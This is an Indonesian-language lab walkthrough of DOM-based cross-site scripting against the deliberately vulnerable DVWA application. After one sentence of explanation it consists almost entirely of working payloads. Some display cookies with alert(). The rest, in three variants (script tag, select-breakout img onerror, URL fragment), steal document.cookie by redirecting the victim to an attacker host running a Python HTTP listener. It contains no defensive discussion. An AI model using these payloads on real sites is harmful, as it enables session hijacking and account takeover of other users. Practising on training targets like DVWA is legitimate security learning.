DOM based XSS muncul ketika Javascript mengambil data dari sumber yang dapat dikontrol oleh penyerang misalnya seperti URL, yang memungkinkan penyerang mengeksekusi code JavaScript yang berbahaya dan membajak akun pengguna lain.
Menampilkan cookie halaman
http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>
Membuat halaman untuk menampung cookie
python3 -m http.server 80
Melakukan pencurian cookie dan kirim ke halaman penampung
http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=<script>window.location='http://<IP_Attacker>/?cookie='+document.cookie</script>
Menampilkan cookie halaman
http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=English</select><img src/onerror=alert(document.cookie)>
Melakukan pencurian cookie dan kirim ke halaman penampung
http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=English</select><img src/onerror=window.location='http://<IP_Attacker>/?cookie='+document.cookie>
Menampilkan cookie halaman
http://<IP_Server>/DVWA/vulnerabilities/xss_d/#?default=<script>alert(document.cookie);</script>
Melakukan pencurian cookie dan kirim ke halaman penampung
http://<IP_Server>/DVWA/vulnerabilities/xss_d/#?default=<script>window.location='http://<IP_Attacker>/?cookie='+document.cookie</script>